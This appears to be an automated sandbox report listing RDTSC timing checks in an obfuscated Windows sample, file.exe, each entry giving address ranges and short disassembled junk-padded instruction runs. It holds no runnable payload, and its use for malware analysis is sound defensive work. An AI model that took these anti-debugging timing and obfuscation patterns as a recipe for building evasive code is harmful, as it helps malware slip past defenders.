              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60269 second address: 4B6026F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6026F second address: 4B60294 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5E68513438h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60294 second address: 4B602AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B602AD second address: 4B602EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 022497D2h 0x00000008 mov ebx, 6D105F1Eh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp], ebx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 pushfd 0x00000017 jmp 00007F5E68513431h 0x0000001c add si, 86A6h 0x00000021 jmp 00007F5E68513431h 0x00000026 popfd 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B602EC second address: 4B602F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B602F0 second address: 4B60327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5E6851342Eh 0x0000000b popad 0x0000000c xchg eax, esi 0x0000000d jmp 00007F5E68513430h 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F5E6851342Eh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60327 second address: 4B60338 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 mov dx, 2AC0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60338 second address: 4B60384 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E68513439h 0x00000009 adc eax, 52371976h 0x0000000f jmp 00007F5E68513431h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push ebp 0x00000019 jmp 00007F5E6851342Ah 0x0000001e mov dword ptr [esp], edi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60384 second address: 4B60388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60388 second address: 4B603A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68513439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B603A5 second address: 4B603E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, D5h 0x00000005 mov dx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [75C74538h] 0x00000010 jmp 00007F5E68E41F22h 0x00000015 xor dword ptr [ebp-08h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5E68E41F27h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B603E3 second address: 4B6040E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68513439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5E6851342Ah 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6040E second address: 4B60480 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, bh 0x00000005 push esi 0x00000006 pop edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c pushad 0x0000000d mov dl, ah 0x0000000f mov dl, AFh 0x00000011 popad 0x00000012 mov bl, cl 0x00000014 popad 0x00000015 push eax 0x00000016 jmp 00007F5E68E41F20h 0x0000001b nop 0x0000001c jmp 00007F5E68E41F20h 0x00000021 lea eax, dword ptr [ebp-10h] 0x00000024 pushad 0x00000025 jmp 00007F5E68E41F1Eh 0x0000002a push eax 0x0000002b push edx 0x0000002c pushfd 0x0000002d jmp 00007F5E68E41F20h 0x00000032 jmp 00007F5E68E41F25h 0x00000037 popfd 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60480 second address: 4B6050B instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F5E68513430h 0x00000008 or eax, 73766998h 0x0000000e jmp 00007F5E6851342Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov dword ptr fs:[00000000h], eax 0x0000001d jmp 00007F5E68513436h 0x00000022 mov dword ptr [ebp-18h], esp 0x00000025 jmp 00007F5E68513430h 0x0000002a mov eax, dword ptr fs:[00000018h] 0x00000030 pushad 0x00000031 jmp 00007F5E6851342Eh 0x00000036 jmp 00007F5E68513432h 0x0000003b popad 0x0000003c mov ecx, dword ptr [eax+00000FDCh] 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B6050B second address: 4B60511 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60511 second address: 4B60533 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop ebx 0x00000005 mov al, 9Ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test ecx, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E68513434h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5026F second address: 4B5028B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5028B second address: 4B502A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, di 0x00000006 mov bl, E7h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5E6851342Eh 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B502A9 second address: 4B502AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B502AD second address: 4B502B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B502B3 second address: 4B502EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F1Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c movzx esi, di 0x0000000f push edi 0x00000010 mov edi, eax 0x00000012 pop esi 0x00000013 popad 0x00000014 sub esp, 2Ch 0x00000017 jmp 00007F5E68E41F21h 0x0000001c xchg eax, ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B502EB second address: 4B502F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B502F1 second address: 4B50355 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F22h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F5E68E41F21h 0x00000010 mov esi, 41BC4D67h 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007F5E68E41F23h 0x0000001e sub cx, 6FAEh 0x00000023 jmp 00007F5E68E41F29h 0x00000028 popfd 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50355 second address: 4B5037D instructions: 0x00000000 rdtsc 0x00000002 call 00007F5E68513430h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d mov edx, 02553472h 0x00000012 movsx edi, si 0x00000015 popad 0x00000016 xchg eax, edi 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5037D second address: 4B50381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50381 second address: 4B50398 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68513433h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50398 second address: 4B503C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E68E41F1Ch 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B503C4 second address: 4B503E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E6851342Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E68513430h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B503E8 second address: 4B503EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B503EC second address: 4B503F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B503F2 second address: 4B50403 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E68E41F1Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50403 second address: 4B50407 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B504A7 second address: 4B504AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B504AD second address: 4B504B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B504B3 second address: 4B504B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B504B7 second address: 4B504BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B504D5 second address: 4B5050A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, FB91h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b pushad 0x0000000c movzx eax, di 0x0000000f movsx edx, ax 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F5E68E41F21h 0x00000019 nop 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F5E68E41F1Dh 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5050A second address: 4B5051A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E6851342Ch 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50558 second address: 4B5055E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5055E second address: 4B505A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jg 00007F5ED95E134Ch 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F5E68513435h 0x00000015 jmp 00007F5E6851342Bh 0x0000001a popfd 0x0000001b movzx eax, di 0x0000001e popad 0x0000001f js 00007F5E68513494h 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov bx, cx 0x0000002b mov eax, 2DB95F4Fh 0x00000030 popad 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B505A5 second address: 4B505D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5E68E41F1Dh 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B505D0 second address: 4B505D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B505D6 second address: 4B505F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F5ED9F0FDD3h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F5E68E41F22h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B505F8 second address: 4B50600 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50600 second address: 4B50703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebx, dword ptr [ebp+08h] 0x0000000a jmp 00007F5E68E41F26h 0x0000000f lea eax, dword ptr [ebp-2Ch] 0x00000012 jmp 00007F5E68E41F20h 0x00000017 xchg eax, esi 0x00000018 pushad 0x00000019 movzx eax, dx 0x0000001c pushfd 0x0000001d jmp 00007F5E68E41F23h 0x00000022 sub esi, 51CB2BDEh 0x00000028 jmp 00007F5E68E41F29h 0x0000002d popfd 0x0000002e popad 0x0000002f push eax 0x00000030 pushad 0x00000031 mov si, di 0x00000034 jmp 00007F5E68E41F23h 0x00000039 popad 0x0000003a xchg eax, esi 0x0000003b jmp 00007F5E68E41F26h 0x00000040 nop 0x00000041 pushad 0x00000042 mov dh, al 0x00000044 popad 0x00000045 push eax 0x00000046 jmp 00007F5E68E41F24h 0x0000004b nop 0x0000004c push eax 0x0000004d push edx 0x0000004e pushad 0x0000004f pushfd 0x00000050 jmp 00007F5E68E41F1Dh 0x00000055 sub cx, E786h 0x0000005a jmp 00007F5E68E41F21h 0x0000005f popfd 0x00000060 pushfd 0x00000061 jmp 00007F5E68E41F20h 0x00000066 xor ax, DA28h 0x0000006b jmp 00007F5E68E41F1Bh 0x00000070 popfd 0x00000071 popad 0x00000072 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50703 second address: 4B50724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, B0CAh 0x00000007 movsx edi, cx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e jmp 00007F5E6851342Ah 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 mov ebx, ecx 0x0000001b popad 0x0000001c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50724 second address: 4B5072A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50035 second address: 4B5007F instructions: 0x00000000 rdtsc 0x00000002 mov eax, 0AE15CDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F5E68513434h 0x0000000e call 00007F5E68513432h 0x00000013 pop esi 0x00000014 pop edi 0x00000015 popad 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F5E68513433h 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5007F second address: 4B5009C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B5009C second address: 4B50110 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F5E68513437h 0x00000009 sbb ch, 0000004Eh 0x0000000c jmp 00007F5E68513439h 0x00000011 popfd 0x00000012 mov ax, 8057h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007F5E6851342Fh 0x00000023 add al, 0000005Eh 0x00000026 jmp 00007F5E68513439h 0x0000002b popfd 0x0000002c movzx esi, di 0x0000002f popad 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50110 second address: 4B50170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 mov ecx, 2C0D073Bh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 call 00007F5E68E41F1Ch 0x00000016 pushad 0x00000017 popad 0x00000018 pop esi 0x00000019 pushfd 0x0000001a jmp 00007F5E68E41F21h 0x0000001f sub ecx, 3EB019F6h 0x00000025 jmp 00007F5E68E41F21h 0x0000002a popfd 0x0000002b popad 0x0000002c xchg eax, ecx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 call 00007F5E68E41F1Fh 0x00000035 pop eax 0x00000036 popad 0x00000037 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50170 second address: 4B501D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68513436h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F5E6851342Bh 0x0000000f xchg eax, ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007F5E6851342Bh 0x00000018 pop ecx 0x00000019 pushfd 0x0000001a jmp 00007F5E68513439h 0x0000001f sub esi, 2441D8C6h 0x00000025 jmp 00007F5E68513431h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50CE5 second address: 4B50CE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50CE9 second address: 4B50D06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68513439h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50D06 second address: 4B50D0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50E61 second address: 4B50E65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50E65 second address: 4B50E69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50E69 second address: 4B50E6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50E6F second address: 4B50E84 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E68E41F21h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B50E84 second address: 4B50E88 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B609E7 second address: 4B60A2E instructions: 0x00000000 rdtsc 0x00000002 mov edx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov bh, al 0x00000008 popad 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F5E68E41F26h 0x00000011 sbb cx, 4BE8h 0x00000016 jmp 00007F5E68E41F1Bh 0x0000001b popfd 0x0000001c mov ch, 97h 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F5E68E41F1Eh 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60A2E second address: 4B60A40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E6851342Eh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60A40 second address: 4B60A8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68E41F1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov ebx, ecx 0x00000010 mov ebx, esi 0x00000012 popad 0x00000013 xchg eax, esi 0x00000014 pushad 0x00000015 mov si, BB9Fh 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F5E68E41F20h 0x00000020 xchg eax, esi 0x00000021 jmp 00007F5E68E41F20h 0x00000026 mov esi, dword ptr [ebp+0Ch] 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60A8B second address: 4B60A8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60A8F second address: 4B60A95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60A95 second address: 4B60A9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60A9B second address: 4B60AD2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007F5E68E41F1Ah 0x0000000f je 00007F5ED9EEF81Eh 0x00000015 jmp 00007F5E68E41F20h 0x0000001a cmp dword ptr [75C7459Ch], 05h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60AD2 second address: 4B60AD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60AD8 second address: 4B60AE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5E68E41F1Bh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60AE7 second address: 4B60AEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60AEB second address: 4B60B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F5ED9F078BAh 0x0000000e jmp 00007F5E68E41F25h 0x00000013 xchg eax, esi 0x00000014 jmp 00007F5E68E41F1Eh 0x00000019 push eax 0x0000001a pushad 0x0000001b mov bh, 19h 0x0000001d call 00007F5E68E41F1Ah 0x00000022 mov esi, 4A459991h 0x00000027 pop esi 0x00000028 popad 0x00000029 xchg eax, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f popad 0x00000030 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60B39 second address: 4B60B4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5E68513432h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60B4F second address: 4B60B55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60B55 second address: 4B60B59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60B7D second address: 4B60B82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60B82 second address: 4B60BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, F5h 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5E68513435h 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B60C07 second address: 4B60C0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
